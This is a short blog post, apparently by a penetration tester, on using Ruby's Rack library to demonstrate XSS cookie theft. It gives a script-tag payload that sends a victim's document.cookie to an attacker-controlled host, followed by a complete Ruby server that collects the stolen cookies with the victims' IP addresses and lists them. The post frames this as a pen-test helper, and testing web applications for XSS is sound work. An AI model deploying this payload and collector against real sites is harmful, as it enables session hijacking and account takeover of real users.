One of the many things I got introduced to at Scotland on Rails was the Rack project. Designed to help create flexible web application deployments, it creates an interface between webservers and ruby web app. frameworks (rails, sinatra etc).
Reading some of the examples, it occurred to me that Rack could be pretty handy for web application testing where sometimes it's useful to have a minimal web application to bounce things off.
One example of this is demo'ing XSS attacks. A standard XSS attack is cookie stealing. The way this works is the attacker inserts a script tag with a reference to a URL controlled by the attacker and inserts the cookie for the victim site into a parameter to the URL.
So for example if we've found an XSS vector we can put
<script>document.location="http://<attacker_ip/cookiegrabber?cookie="+document.cookie</script>
into the vulnerable box and if we have a server listening on that IP address we get the cookie..
Here's where rack comes in. You can use rack to very quickly create some code to listen on a port and accept the incoming request (and indeed to anything else you can do with ruby, but hey lets start small).
A proof of concept script to do something like this might look like the one below...
#!/usr/bin/env ruby
require 'rubygems'
require 'rack'
builder = Rack::Builder.new do
use Rack::CommonLogger
@@grabbed = Array.new
map '/' do
run Proc.new {|env| [200, {"Content-Type" => "text/html"}, "<h1> Rack Pen Test Helper</h1>"]}
end
map '/cookiegrabber' do
app = proc do |env|
req = Rack::Request.new(env)
ip = req.ip.to_s
cookie = req.params['cookie'] || "No Cookie Parameter passed"
@@grabbed << [ip,cookie]
[200, {"Content-Type" => "text/html"}, "grabbed " + cookie + " from " + ip + "<br /> Grabbed " + @@grabbed.length.to_s + " cookies so far"]
end
run app
end
map '/cookiegrabbed' do
app = proc do |env|
out = ""
if @@grabbed.length > 0
@@grabbed.each do |crumb|
out << "Grabbed a cookie with value " + crumb[1] + " from " + crumb[0] + "<br />"
end
else
out = "Nothing Grabbed so far"
end
[200, {"Content-Type" => "text/html"}, out]
end
run app
end
end
Rack::Handler::Mongrel.run builder, :Port => 9292
